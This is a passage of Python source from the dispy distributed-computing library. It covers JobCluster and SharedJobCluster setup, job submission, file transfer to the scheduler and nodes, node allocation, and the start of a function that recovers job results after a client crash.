If pulse_interval is given and reentrant is False (default), jobs scheduled for a dead node are automatically cancelled; if reentrant is True, then jobs scheduled for a dead node are resubmitted to other eligible nodes. @recover_file must be either None (default) or file path. If this is None, dispy stores information about cluster in a file of the form '_dispy_YYYYMMDDHHMMSS' in current directory. If it is a path, dispy will use given path to store information. If user program terminates for some reason (such as raising an exception), it is possible to retrieve results of scheduled jobs later (after they are finished) by calling 'recover' function (implemented in this file) with this file. """ logger.setLevel(loglevel) pycos.logger.setLevel(loglevel) if reentrant is not True and reentrant is not False: logger.warning('Invalid value for reentrant (%s) is ignored; ' 'it must be either True or False', reentrant) reentrant = False if ping_interval is not None: try: ping_interval = float(ping_interval) assert 1.0 <= ping_interval <= 1000 except: raise Exception('Invalid ping_interval; must be between 1 and 1000') self.ping_interval = ping_interval if pulse_interval is not None: try: pulse_interval = float(pulse_interval) assert 1.0 <= pulse_interval <= 1000 except: raise Exception('Invalid pulse_interval; must be between 1 and 1000') self.pulse_interval = pulse_interval if poll_interval is not None: try: poll_interval = float(poll_interval) assert 5.0 <= poll_interval <= 1000 except: raise Exception('Invalid poll_interval; must be between 5 and 1000') self.poll_interval = poll_interval if callback: assert inspect.isfunction(callback) or inspect.ismethod(callback), \ 'callback must be a function or method' try: args = inspect.getargspec(callback) if inspect.isfunction(callback): assert len(args.args) == 1 else: assert len(args.args) == 2 if args.args[0] != 'self': logger.warning('First argument to callback method is not "self"') assert args.varargs is None assert 
args.keywords is None assert args.defaults is None except: raise Exception('Invalid callback function; ' 'it must take excatly one argument - an instance of DispyJob') self.callback = callback if cluster_status: assert inspect.isfunction(cluster_status) or inspect.ismethod(cluster_status), \ 'cluster_status must be a function or method' try: args = inspect.getargspec(cluster_status) if inspect.isfunction(cluster_status): assert len(args.args) == 3 else: assert len(args.args) == 4 if args.args[0] != 'self': logger.warning('First argument to cluster_status method is not "self"') assert args.varargs is None assert args.keywords is None assert args.defaults is None except: raise Exception('Invalid cluster_status function; ' 'it must take excatly 3 arguments') self.status_callback = cluster_status if hasattr(self, 'scheduler_ip_addr'): shared = True self._node_allocs = [] else: shared = False if not nodes: nodes = ['*'] elif not isinstance(nodes, list): if isinstance(nodes, str): nodes = [nodes] else: raise Exception('"nodes" must be list of IP addresses or host names') self._node_allocs = _parse_node_allocs(nodes) if not self._node_allocs: raise Exception('"nodes" argument is invalid') self._node_allocs = sorted(self._node_allocs, key=lambda node_alloc: node_alloc.ip_rex, reverse=True) self._dispy_nodes = {} if inspect.isfunction(computation): func = computation compute = _Compute(_Compute.func_type, func.__name__) lines = inspect.getsourcelines(func)[0] lines[0] = lines[0].lstrip() compute.code = ''.join(lines) elif isinstance(computation, str): compute = _Compute(_Compute.prog_type, computation) depends.append(computation) else: raise Exception('Invalid computation type: %s' % type(computation)) if setup: if inspect.isfunction(setup): depends.append(setup) compute.setup = _Function(setup.__name__, (), {}) elif isinstance(setup, functools.partial): depends.append(setup.func) if setup.args: args = setup.args else: args = () if setup.keywords: kwargs = setup.keywords 
else: kwargs = {} compute.setup = _Function(setup.func.__name__, args, kwargs) else: raise Exception('"setup" must be Python (partial) function') if inspect.isfunction(cleanup): depends.append(cleanup) compute.cleanup = _Function(cleanup.__name__, (), {}) elif isinstance(cleanup, functools.partial): depends.append(cleanup.func) if cleanup.args: args = cleanup.args else: args = () if cleanup.keywords: kwargs = cleanup.keywords else: kwargs = {} compute.cleanup = _Function(cleanup.func.__name__, args, kwargs) elif isinstance(cleanup, bool): compute.cleanup = cleanup else: raise Exception('"cleanup" must be Python (partial) function') self._cluster = _Cluster(ip_addr=ip_addr, port=port, node_port=node_port, ext_ip_addr=ext_ip_addr, shared=shared, secret=secret, keyfile=keyfile, certfile=certfile, recover_file=recover_file) atexit.register(self.shutdown) depend_ids = {} cwd = self._cluster.dest_path for dep in depends: if isinstance(dep, str) or inspect.ismodule(dep): if inspect.ismodule(dep): name = dep.__file__ if name.endswith('.pyc'): name = name[:-1] if not name.endswith('.py'): logger.warning('Invalid module "%s" - must be python source.', dep) continue if name.startswith(cwd): dst = os.path.dirname(name[len(cwd):].lstrip(os.sep)) elif dep.__package__: dst = dep.__package__.replace('.', os.sep) else: dst = os.path.dirname(dep.__name__.replace('.', os.sep)) else: if os.path.isfile(dep): name = os.path.abspath(dep) elif compute.type == _Compute.prog_type: for p in os.environ['PATH'].split(os.pathsep): f = os.path.join(p, dep) if os.path.isfile(f): logger.debug('Assuming "%s" is program "%s"', dep, f) name = f break else: raise Exception('Path "%s" is not valid' % dep) if name.startswith(cwd): dst = os.path.dirname(name[len(cwd):].lstrip(os.sep)) else: dst = '.' 
if name in depend_ids: continue try: with open(name, 'rb') as fd: pass xf = _XferFile(name, dst, compute.id) compute.xfer_files.add(xf) depend_ids[name] = dep except: raise Exception('File "%s" is not valid' % name) elif inspect.isfunction(dep) or inspect.isclass(dep) or hasattr(dep, '__class__'): if inspect.isfunction(dep) or inspect.isclass(dep): pass elif hasattr(dep, '__class__') and inspect.isclass(dep.__class__): dep = dep.__class__ if id(dep) in depend_ids: continue lines = inspect.getsourcelines(dep)[0] lines[0] = lines[0].lstrip() compute.code += '\n' + ''.join(lines) depend_ids[id(dep)] = id(dep) elif isinstance(dep, functools.partial): lines = inspect.getsourcelines(dep.func)[0] lines[0] = lines[0].lstrip() compute.code += '\n' + ''.join(lines) depend_ids[id(dep)] = id(dep) else: raise Exception('Invalid function: %s' % dep) if compute.code: # make sure code can be compiled code = compile(compute.code, '<string>', 'exec') del code if dest_path: if not isinstance(dest_path, str): raise Exception('Invalid dest_path: it must be a string') dest_path = dest_path.strip() # we should check for absolute path in dispynode.py as well if dest_path.startswith(os.sep): logger.warning('dest_path must not be absolute path') dest_path = dest_path.lstrip(os.sep) compute.dest_path = dest_path compute.scheduler_port = self._cluster.port compute.auth = hashlib.sha1(os.urandom(20)).hexdigest() compute.job_result_port = self._cluster.port compute.reentrant = reentrant compute.pulse_interval = pulse_interval self._compute = compute self._pending_jobs = 0 self._jobs = [] self._complete = threading.Event() self._complete.set() self.cpu_time = 0 self.start_time = time.time() self.end_time = None if not shared: Task(self._cluster.add_cluster, self).value() def submit(self, *args, **kwargs): """Submit a job for execution with the given arguments. Arguments should be serializable and should correspond to arguments for computation used when cluster is created. 
""" if self._compute.type == _Compute.prog_type: args = [str(arg) for arg in args] try: _job = _DispyJob_(self._compute.id, args, kwargs) except: logger.warning('Creating job for "%s", "%s" failed with "%s"', str(args), str(kwargs), traceback.format_exc()) return None if Task(self._cluster.submit_job, _job).value() == 0: return _job.job else: return None def submit_node(self, node, *args, **kwargs): """Submit a job for execution at 'node' with the given arguments. 'node' can be an instance of DispyNode (e.g., as received in cluster/job status callback) or IP address or host name. Arguments should be serializable and should correspond to arguments for computation used when cluster is created. """ if isinstance(node, DispyNode): node = self._dispy_nodes.get(node.ip_addr, None) elif isinstance(node, str): if node[0].isdigit(): node = self._dispy_nodes.get(node, None) else: node = _node_ipaddr(node) node = self._dispy_nodes.get(node, None) else: node = None if not node: logger.warning('Invalid node') return None if self._compute.type == _Compute.prog_type: args = [str(arg) for arg in args] try: _job = _DispyJob_(self._compute.id, args, kwargs) except: logger.warning('Creating job for "%s", "%s" failed with "%s"', str(args), str(kwargs), traceback.format_exc()) return None if Task(self._cluster.submit_job, _job, node).value() == 0: return _job.job else: return None def cancel(self, job): """Cancel given job. If the job is not yet running on any node, it is simply removed from scheduler's queue. If the job is running on a node, it is terminated/killed. Returns 0 if the job has been cancelled (i.e., removed from the queue or terminated). """ return Task(self._cluster.cancel_job, job).value() def allocate_node(self, node): """Allocate given node for this cluster. 'node' may be host name or IP address, or an instance of NodeAllocate. """ return Task(self._cluster.allocate_node, self, node).value() def deallocate_node(self, node): """Deallocate given node for this cluster. 
'node' may be host name or IP address, or an instance of NodeAllocate. """ return Task(self._cluster.deallocate_node, self, node).value() def close_node(self, node, terminate_pending=False): """Close given node for this cluster. 'node' may be host name or IP address, or an instance of NodeAllocate. """ return Task(self._cluster.close_node, self, node, terminate_pending).value() def node_jobs(self, node, from_node=False): """Returns list of jobs currently running on given node, given as host name or IP address. """ return Task(self._cluster.node_jobs, self, node, from_node).value() def set_node_cpus(self, node, cpus): """Sets (alters) CPUs managed by dispy on a node, given as host name or IP address, to given number of CPUs. If the number of CPUs given is negative then that many CPUs are not used (from the available CPUs). """ return Task(self._cluster.set_node_cpus, node, cpus).value() def send_file(self, path, node): """Send file with given 'path' to 'node'. 'node' can be an instance of DispyNode (e.g., as received in cluster status callback) or IP address or host name. """ if isinstance(node, DispyNode): node = self._dispy_nodes.get(node.ip_addr, None) elif isinstance(node, str): if node[0].isdigit(): node = self._dispy_nodes.get(node, None) else: node = _node_ipaddr(node) node = self._dispy_nodes.get(node, None) else: node = None if not node: return -1 cwd = self._cluster.dest_path path = os.path.abspath(path) if path.startswith(cwd): dst = os.path.dirname(path[len(cwd):].lstrip(os.sep)) else: dst = '.' xf = _XferFile(path, dst, self._compute.id) return Task(self._cluster.send_file, self, node, xf).value() @property def name(self): """Returns name of computation. If the computation is Python function, then this would be name of the function. If the computation is a program, then this would be name of the program (without path). 
""" return self._compute.name def __enter__(self): return self def __exit__(self, exc_type, exc_value, trace): self.close() return True def status(self): """ Return cluster status (ClusterStatus structure). """ def _status(self, task=None): yield ClusterStatus(list(self._dispy_nodes.values()), self._pending_jobs) return Task(_status, self).value() def print_status(self, wall_time=None): """ Prints status of cluster (see 'status'). """ print('') heading = ' %30s | %5s | %7s | %10s | %13s' % \ ('Node', 'CPUs', 'Jobs', 'Sec/Job', 'Node Time Sec') print(heading) print('-' * len(heading)) info = self.status() cpu_time = 0.0 for dispy_node in info.nodes: cpu_time += dispy_node.cpu_time name = dispy_node.ip_addr if dispy_node.name: name += ' (' + dispy_node.name + ')' if dispy_node.jobs_done > 0: secs_per_job = dispy_node.cpu_time / dispy_node.jobs_done else: secs_per_job = 0 print(' %-30.30s | %5s | %7s | %10.3f | %13.3f' % (name, dispy_node.cpus, dispy_node.jobs_done, secs_per_job, dispy_node.cpu_time)) print('') if info.jobs_pending: print('Jobs pending: %s' % info.jobs_pending) msg = 'Total job time: %.3f sec' % cpu_time if not wall_time: wall_time = time.time() - self.start_time msg += ', wall time: %.3f sec, speedup: %.3f' % (wall_time, cpu_time / wall_time) print(msg) print('') # for backward compatibility stats = print_status def wait(self, timeout=None): """Wait for scheduled jobs to complete. """ return self._complete.wait(timeout=timeout) def __call__(self): """Wait for scheduled jobs to complete. """ self.wait() def close(self, timeout=None, terminate=False): """Close the cluster (jobs can no longer be submitted to it). If there are any jobs pending, this method waits until they all finish, unless 'terminate' is True in which case pending jobs are cancelled (removed or terminated by nodes executing them). Additional clusters may be created after this call returns. 
""" if self._compute: ret = self._complete.wait(timeout=timeout) if not terminate and not ret: return False self._complete.set() Task(self._cluster.del_cluster, self).value() self._compute = None return True def shutdown(self): """Close the cluster and shutdown the scheduler (so additional clusters can't be created). """ self.close() if self._cluster: cluster, self._cluster = self._cluster, None cluster.shutdown() class SharedJobCluster(JobCluster): """SharedJobCluster should be used (instead of JobCluster) if two or more processes can simultaneously use dispy. In this case, 'dispyscheduler' must be running on a node and 'scheduler_node' parameter should be set to that node's IP address or host name. @scheduler_node is name or IP address where dispyscheduler is running to which jobs are submitted. @scheduler_port is port where dispyscheduler is running at @scheduler_node. @port is port where this client will get job results from dispyscheduler. @pulse_interval for SharedJobCluster is not used; instead, dispyscheduler must be called with appropriate pulse_interval. The behaviour is same as for JobCluster. 
""" def __init__(self, computation, nodes=None, depends=[], callback=None, cluster_status=None, ip_addr=None, port=51347, scheduler_node=None, scheduler_port=None, ext_ip_addr=None, loglevel=logger.INFO, setup=None, cleanup=True, dest_path=None, poll_interval=None, reentrant=False, exclusive=False, secret='', keyfile=None, certfile=None, recover_file=None): self.addrinfo = node_addrinfo(scheduler_node) self.scheduler_ip_addr = self.addrinfo.ip if not nodes: nodes = ['*'] elif not isinstance(nodes, list): if isinstance(nodes, str): nodes = [nodes] else: raise Exception('"nodes" must be list of IP addresses or host names') node_allocs = _parse_node_allocs(nodes) if not node_allocs: raise Exception('"nodes" argument is invalid') node_allocs = [(na.ip_addr, na.port, na.cpus) for na in node_allocs] if ext_ip_addr: ext_ip_addr = node_addrinfo(ext_ip_addr).ip JobCluster.__init__(self, computation, depends=depends, callback=callback, cluster_status=cluster_status, ip_addr=ip_addr, port=port, ext_ip_addr=ext_ip_addr, loglevel=loglevel, setup=setup, cleanup=cleanup, dest_path=dest_path, poll_interval=poll_interval, reentrant=reentrant, secret=secret, keyfile=keyfile, certfile=certfile, recover_file=recover_file) def _terminate_scheduler(self, task=None): yield self._cluster._sched_event.set() # wait for scheduler to terminate self._cluster.terminate = True Task(_terminate_scheduler, self).value() self._cluster._scheduler.value() self._cluster.job_uid = None if not scheduler_port: scheduler_port = 51349 # wait until tcp server has started while not self._cluster.port: time.sleep(0.1) sock = socket.socket(self.addrinfo.family, socket.SOCK_STREAM) sock = AsyncSocket(sock, blocking=True, keyfile=keyfile, certfile=certfile) sock.connect((self.scheduler_ip_addr, scheduler_port)) sock.sendall(self._cluster.auth) req = {'version': _dispy_version, 'ip_addr': ext_ip_addr, 'scheduler_ip_addr': self.scheduler_ip_addr} sock.send_msg(b'CLIENT:' + serialize(req)) reply = sock.recv_msg() 
sock.close() reply = deserialize(reply) if reply['version'] != _dispy_version: raise Exception('dispyscheduler version "%s" is different from dispy version "%s"' % reply['version'], _dispy_version) ext_ip_addr = reply['ip_addr'] self.scheduler_port = reply['port'] self._scheduler_auth = auth_code(secret, reply['sign']) self._compute.scheduler_ip_addr = ext_ip_addr self._compute.scheduler_port = self._cluster.port self._compute.job_result_port = self._cluster.port sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM), blocking=True, keyfile=keyfile, certfile=certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) req = {'compute': self._compute, 'node_allocs': node_allocs, 'exclusive': bool(exclusive)} sock.send_msg(b'COMPUTE:' + serialize(req)) reply = sock.recv_msg() reply = deserialize(reply) if isinstance(reply, dict): self._compute.id = reply['compute_id'] self._compute.auth = reply['auth'] else: raise Exception('Scheduler refused computation: %s' % reply) except: raise finally: sock.close() for xf in self._compute.xfer_files: xf.compute_id = self._compute.id logger.debug('Sending file "%s"', xf.name) sock = socket.socket(self.addrinfo.family, socket.SOCK_STREAM) sock = AsyncSocket(sock, blocking=True, keyfile=keyfile, certfile=certfile) sock.settimeout(MsgTimeout) try: sock.connect((self.scheduler_ip_addr, self.scheduler_port)) sock.sendall(self._scheduler_auth) sock.send_msg(b'FILEXFER:' + serialize(xf)) recvd = sock.recv_msg() recvd = deserialize(recvd) sent = 0 with open(xf.name, 'rb') as fd: while sent == recvd: data = fd.read(1024000) if not data: break sock.sendall(data) sent += len(data) recvd = sock.recv_msg() recvd = deserialize(recvd) assert recvd == xf.stat_buf.st_size except: logger.error('Could not transfer %s to %s', xf.name, self.scheduler_ip_addr) # TODO: delete computation? 
        # --- tail of __init__ (the definition starts before this chunk):
        # register the computation with the remote dispyscheduler.
        sock.close()
        # Register this cluster with the local cluster manager; '.value()'
        # blocks until the pycos task completes.
        Task(self._cluster.add_cluster, self).value()
        self._scheduled_event = threading.Event()
        sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                           blocking=True, keyfile=keyfile, certfile=certfile)
        sock.settimeout(MsgTimeout)
        sock.connect((self.scheduler_ip_addr, self.scheduler_port))
        sock.sendall(self._scheduler_auth)
        req = {'compute_id': self._compute.id, 'auth': self._compute.auth}
        sock.send_msg(b'SCHEDULE:' + serialize(req))
        resp = sock.recv_msg()
        sock.close()
        if resp == b'ACK':
            # Scheduler accepted the computation; wait until it signals that
            # scheduling is done.
            self._scheduled_event.wait()
            logger.debug('Computation %s created with %s',
                         self._compute.name, self._compute.id)
        else:
            # Scheduler rejected: undo the local registration and fail loudly.
            self._cluster._clusters.pop(self._compute.id, None)
            raise Exception('Computation "%s" could not be sent to scheduler' %
                            self._compute.name)

    def submit(self, *args, **kwargs):
        """Submit a job for execution with the given arguments.

        Arguments should be serializable and should correspond to arguments
        for computation used when cluster is created.
        """
        # Convenience wrapper: 'node=None' lets the scheduler pick the node.
        return self.submit_node(None, *args, **kwargs)

    def submit_node(self, node, *args, **kwargs):
        """Submit a job for execution at 'node' with the given arguments.

        'node' can be an instance of DispyNode (e.g., as received in
        cluster/job status callback) or IP address or host name.

        Arguments should be serializable and should correspond to arguments
        for computation used when cluster is created.
        """
        if node:
            # Normalize 'node' to an IP address string.
            if isinstance(node, DispyNode):
                node = node.ip_addr
            elif isinstance(node, str):
                node = _node_ipaddr(node)
            else:
                node = None
            if not node:
                return None
        if self._compute.type == _Compute.prog_type:
            # Program (executable) computations take string arguments.
            args = [str(arg) for arg in args]
        try:
            _job = _DispyJob_(self._compute.id, args, kwargs)
        except:
            logger.warning('Creating job for "%s", "%s" failed with "%s"',
                           str(args), str(kwargs), traceback.format_exc())
            return None
        job = None
        try:
            # First push any files this job depends on to the scheduler.
            # NOTE(review): if AsyncSocket/connect raises before 'sock' is
            # bound (e.g. on the first iteration), the 'finally' below would
            # hit an unbound 'sock' -- confirm intended.
            for xf in _job.xfer_files:
                sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                                   blocking=True, keyfile=self._cluster.keyfile,
                                   certfile=self._cluster.certfile)
                sock.settimeout(MsgTimeout)
                sock.connect((self.scheduler_ip_addr, self.scheduler_port))
                sock.sendall(self._scheduler_auth)
                sock.send_msg(b'FILEXFER:' + serialize(xf))
                recvd = sock.recv_msg()
                recvd = deserialize(recvd)
                sent = 0
                with open(xf.name, 'rb') as fd:
                    # 'recvd' reports how many bytes the receiver has taken;
                    # keep sending while the receiver is caught up with us.
                    while sent == recvd:
                        data = fd.read(1024000)
                        if not data:
                            break
                        sock.sendall(data)
                        sent += len(data)
                        recvd = sock.recv_msg()
                        recvd = deserialize(recvd)
                assert recvd == xf.stat_buf.st_size
                sock.close()
            # Now submit the job itself.
            sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                               blocking=True, keyfile=self._cluster.keyfile,
                               certfile=self._cluster.certfile)
            sock.settimeout(MsgTimeout)
            sock.connect((self.scheduler_ip_addr, self.scheduler_port))
            sock.sendall(self._scheduler_auth)
            req = {'node': node, 'job': _job, 'auth': self._compute.auth}
            sock.send_msg(b'JOB:' + serialize(req))
            msg = sock.recv_msg()
            _job.uid = deserialize(msg)
            if _job.uid:
                # Scheduler assigned a uid: job accepted; track it locally.
                self._cluster._sched_jobs[_job.uid] = _job
                self._pending_jobs += 1
                self._complete.clear()
                sock.send_msg(b'ACK')
                if self.status_callback:
                    self._cluster.worker_Q.put((self.status_callback,
                                                (DispyJob.Created, None, _job.job)))
                job = _job.job
            else:
                # Scheduler declined the job.
                sock.send_msg('NAK'.encode())
                _job.job._dispy_job_ = None
                del _job.job
        except:
            logger.warning('Creating job for "%s", "%s" failed with "%s"',
                           str(args), str(kwargs), traceback.format_exc())
            # NOTE(review): if the failure happened after the NAK branch above
            # already deleted '_job.job', this 'del' would raise again.
            _job.job._dispy_job_ = None
            del _job.job
        finally:
            sock.close()
        return job

    def cancel(self, job):
        """Similar to 'cancel' of JobCluster.
        """
        _job = job._dispy_job_
        # Validate that the job belongs to this cluster.
        if _job is None or self._cluster._clusters.get(_job.compute_id, None) != self:
            logger.warning('Invalid job %s for cluster "%s"!',
                           job.id, self._compute.name)
            return -1
        # Only jobs that are not yet finished can be cancelled.
        if job.status not in [DispyJob.Created, DispyJob.Running,
                              DispyJob.ProvisionalResult]:
            logger.warning('Job %s is not valid for cancel (%s)', job.id, job.status)
            return -1
        job.status = DispyJob.Cancelled
        # assert self._pending_jobs >= 1
        sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                           blocking=True, keyfile=self._cluster.keyfile,
                           certfile=self._cluster.certfile)
        sock.settimeout(MsgTimeout)
        try:
            sock.connect((self.scheduler_ip_addr, self.scheduler_port))
            sock.sendall(self._scheduler_auth)
            req = {'uid': _job.uid, 'compute_id': self._compute.id,
                   'auth': self._compute.auth}
            sock.send_msg(b'TERMINATE_JOB:' + serialize(req))
        except:
            logger.warning('Could not connect to scheduler to terminate job')
            return -1
        finally:
            sock.close()
        return 0

    def allocate_node(self, node_alloc):
        """Similar to 'allocate_node' of JobCluster.
        """
        if not isinstance(node_alloc, list):
            node_alloc = [node_alloc]
        node_allocs = _parse_node_allocs(node_alloc)
        if not node_allocs:
            # NOTE(review): other error paths in this class return -1;
            # raising StopIteration in a non-generator is inconsistent --
            # confirm callers expect an exception here.
            raise StopIteration(-1)
        if len(node_allocs) != 1:
            return -1
        node_alloc = node_allocs[0]
        sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                           blocking=True, keyfile=self._cluster.keyfile,
                           certfile=self._cluster.certfile)
        sock.settimeout(MsgTimeout)
        try:
            sock.connect((self.scheduler_ip_addr, self.scheduler_port))
            sock.sendall(self._scheduler_auth)
            req = {'compute_id': self._compute.id, 'auth': self._compute.auth,
                   'node_alloc': node_alloc}
            sock.send_msg(b'ALLOCATE_NODE:' + serialize(req))
            reply = sock.recv_msg()
            reply = deserialize(reply)
        except:
            logger.warning('Could not connect to scheduler to add node')
            reply = -1
        finally:
            sock.close()
        return reply

    def deallocate_node(self, node):
        """Similar to 'deallocate_node' of JobCluster.
        """
        # Normalize 'node' to an IP address string.
        if isinstance(node, DispyNode):
            node = node.ip_addr
        else:
            node = _node_ipaddr(node)
        if not node:
            return -1
        sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                           blocking=True, keyfile=self._cluster.keyfile,
                           certfile=self._cluster.certfile)
        sock.settimeout(MsgTimeout)
        try:
            sock.connect((self.scheduler_ip_addr, self.scheduler_port))
            sock.sendall(self._scheduler_auth)
            req = {'compute_id': self._compute.id, 'auth': self._compute.auth,
                   'node': node}
            sock.send_msg(b'DEALLOCATE_NODE:' + serialize(req))
            reply = sock.recv_msg()
            reply = deserialize(reply)
        except:
            # NOTE(review): message says 'add node' -- copy-pasted from
            # allocate_node; cannot change the string in a doc-only pass.
            logger.warning('Could not connect to scheduler to add node')
            reply = -1
        finally:
            sock.close()
        return reply

    def close_node(self, node, terminate_pending=False):
        """Similar to 'close_node' of JobCluster.
        """
        # Normalize 'node' to an IP address string.
        if isinstance(node, DispyNode):
            node = node.ip_addr
        else:
            node = _node_ipaddr(node)
        if not node:
            return -1
        sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                           blocking=True, keyfile=self._cluster.keyfile,
                           certfile=self._cluster.certfile)
        sock.settimeout(MsgTimeout)
        try:
            sock.connect((self.scheduler_ip_addr, self.scheduler_port))
            sock.sendall(self._scheduler_auth)
            req = {'compute_id': self._compute.id, 'auth': self._compute.auth,
                   'node': node, 'terminate_pending': terminate_pending}
            sock.send_msg(b'CLOSE_NODE:' + serialize(req))
            reply = sock.recv_msg()
            reply = deserialize(reply)
        except:
            logger.warning('Could not connect to scheduler to add node')
            reply = -1
        finally:
            sock.close()
        return reply

    def node_jobs(self, node, from_node=False):
        """Similar to 'node_jobs' of JobCluster.
        """
        # Normalize 'node' to an IP address string.
        if isinstance(node, DispyNode):
            node = node.ip_addr
        else:
            node = _node_ipaddr(node)
        if not node:
            return []
        sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                           blocking=True, keyfile=self._cluster.keyfile,
                           certfile=self._cluster.certfile)
        sock.settimeout(MsgTimeout)
        try:
            sock.connect((self.scheduler_ip_addr, self.scheduler_port))
            sock.sendall(self._scheduler_auth)
            req = {'compute_id': self._compute.id, 'auth': self._compute.auth,
                   'node': node, 'get_uids': True, 'from_node': bool(from_node)}
            sock.send_msg(b'NODE_JOBS:' + serialize(req))
            reply = sock.recv_msg()
            job_uids = deserialize(reply)
            # Map uids back to locally tracked jobs; unknown uids become None
            # and are filtered out below.
            _jobs = [self._cluster._sched_jobs.get(uid, None) for uid in job_uids]
        except:
            logger.warning('Could not connect to scheduler to get running jobs at node')
            _jobs = []
        finally:
            sock.close()
        jobs = [_job.job for _job in _jobs if _job]
        return jobs

    def set_node_cpus(self, node, cpus):
        """Similar to 'set_node_cpus' of JobCluster.
        """
        sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                           blocking=True, keyfile=self._cluster.keyfile,
                           certfile=self._cluster.certfile)
        sock.settimeout(MsgTimeout)
        try:
            sock.connect((self.scheduler_ip_addr, self.scheduler_port))
            sock.sendall(self._scheduler_auth)
            req = {'compute_id': self._compute.id, 'auth': self._compute.auth,
                   'node': node, 'cpus': cpus}
            sock.send_msg(b'SET_NODE_CPUS:' + serialize(req))
            reply = sock.recv_msg()
            reply = deserialize(reply)
        except:
            logger.warning('Could not connect to scheduler to add node')
            return -1
        finally:
            sock.close()
        return reply

    def send_file(self, path, node):
        """Send file with given 'path' to 'node'.

        'node' can be an instance of DispyNode (e.g., as received in cluster
        status callback) or IP address or host name.
        """
        if node:
            # Normalize 'node' to an IP address string.
            if isinstance(node, DispyNode):
                node = node.ip_addr
            elif isinstance(node, str):
                node = _node_ipaddr(node)
            else:
                node = None
            if not node:
                return -1
        # Files under the cluster's dest_path keep their relative location;
        # anything else lands in the node's current directory.
        cwd = self._cluster.dest_path
        path = os.path.abspath(path)
        if path.startswith(cwd):
            dst = os.path.dirname(path[len(cwd):].lstrip(os.sep))
        else:
            dst = '.'
        xf = _XferFile(path, dst, self._compute.id)
        sock = AsyncSocket(socket.socket(self.addrinfo.family, socket.SOCK_STREAM),
                           blocking=True, keyfile=self._cluster.keyfile,
                           certfile=self._cluster.certfile)
        sock.settimeout(MsgTimeout)
        # NOTE(review): unlike the other methods above, 'sock' is never
        # closed here (no 'finally') -- likely a socket leak; confirm.
        try:
            sock.connect((self.scheduler_ip_addr, self.scheduler_port))
            sock.sendall(self._scheduler_auth)
            sock.send_msg(b'SENDFILE:' + serialize({'node': node, 'xf': xf}))
            recvd = sock.recv_msg()
            recvd = deserialize(recvd)
            sent = 0
            with open(xf.name, 'rb') as fd:
                # Keep sending while the receiver confirms it has taken
                # everything sent so far.
                while sent == recvd:
                    data = fd.read(1024000)
                    if not data:
                        break
                    sock.sendall(data)
                    sent += len(data)
                    recvd = sock.recv_msg()
                    recvd = deserialize(recvd)
            assert recvd == xf.stat_buf.st_size
        except:
            return -1
        else:
            return 0


def recover_jobs(recover_file=None, timeout=None, terminate_pending=False):
    """
    If dispy client crashes or loses connection to nodes, the nodes will
    continue to execute scheduled jobs.
    This 'recover_jobs' function can be used to retrieve the results of
    those jobs (DispyJob objects).

    @recover_file is path to file in which dispy stored information about
    cluster (see 'recover_file' in JobCluster above). If incorrect
    'recover_file' is used, this function issues a warning and will block.

    @timeout is time limit in seconds for recovery. This function will
    return all jobs that finish before 'timeout'. Any jobs still running or
    couldn't be recovered before timeout will be ignored.

    @terminate_pending indicates if any jobs currently running should be
    terminated (so that, for example, node can be used for computations
    again right away instead of having to wait until all jobs finish).

    Returns list of DispyJob instances that will have .result, .stdout,
    .stderr etc.; however, the nodes don't keep track of .id, .args,
    .kwargs so they will be None.

    Once all the jobs that were scheduled at the time of crash are
    retrieved (if the jobs are still running, this function will block
    until all the jobs are finished and results obtained), nodes are closed
    (so they can serve new clients), 'recover_file' is removed and the jobs
    are returned.
    """
    if not recover_file:
        # No file given: pick the most recent '_dispy_*' file by name.
        import glob
        recover_file = sorted(glob.glob('_dispy_*'))
        if recover_file:
            recover_file = recover_file[-1]
        else:
            print('Could not find recover file of the form "_dispy_*"')
            return []

    shelf_nodes = {}
    computes = {}
    cluster = None
    pycos_scheduler = pycos.Pycos.instance()
    try:
        shelf = shelve.open(recover_file, flag='r')
    except:
        print('Could not open recover file "%s"' % recover_file)
        return []

    # The shelf holds 'node_<ip>', 'compute_<id>' and '_cluster' entries.
    for key, val in shelf.items():
        if key.startswith('node_'):
            shelf_nodes[key[len('node_'):]] = val
        elif key.startswith('compute_'):
            computes[int(key[len('compute_'):])] = val
        elif key == '_cluster':
            cluster = val
        else:
            logger.warning('Invalid key "%s" ignored', key)
    shelf.close()
    if not cluster or not computes or not shelf_nodes:
        # Nothing usable in the shelf: remove the recover file (the dbm
        # backend behind shelve may have used any of these extensions).
        for ext in ('', '.db', '.bak', '.dat', '.dir'):
            if os.path.isfile(recover_file + ext):
                try:
                    os.remove(recover_file + ext)
                except:
                    pass
        return []

    # Rebuild _Node objects from the persisted node info.
    nodes = {}
    for ip_addr, info in shelf_nodes.items():
        node = _Node(ip_addr, info['port'], 0, '', cluster['secret'],
                     platform='', keyfile=cluster['keyfile'],
                     certfile=cluster['certfile'])
        node.auth = info['auth']
        if info.get('scheduler'):
            node.scheduler_ip_addr = ip_addr
        nodes[node.ip_addr] = node

    def tcp_req(conn, addr, pending, task=None):
        # generator
        # Handle one incoming connection: expect a JOB_REPLY carrying the
        # result of a job scheduled before the crash.
        conn.settimeout(MsgTimeout)
        msg = yield conn.recv_msg()
        if msg.startswith(b'JOB_REPLY:'):
            try:
                reply = deserialize(msg[len(b'JOB_REPLY:'):])
            except:
                logger.warning('Invalid job reply from %s:%s ignored',
                               addr[0], addr[1])
                conn.close()
                raise StopIteration
            yield conn.send_msg(b'ACK')
            logger.debug('Received reply for job %s', reply.uid)
            # Reconstruct a DispyJob; .id/.args/.kwargs are not recoverable.
            job = DispyJob((), {})
            job.result = deserialize(reply.result)
            job.stdout = reply.stdout
            job.stderr = reply.stderr
            job.exception = reply.exception
            job.start_time = reply.start_time
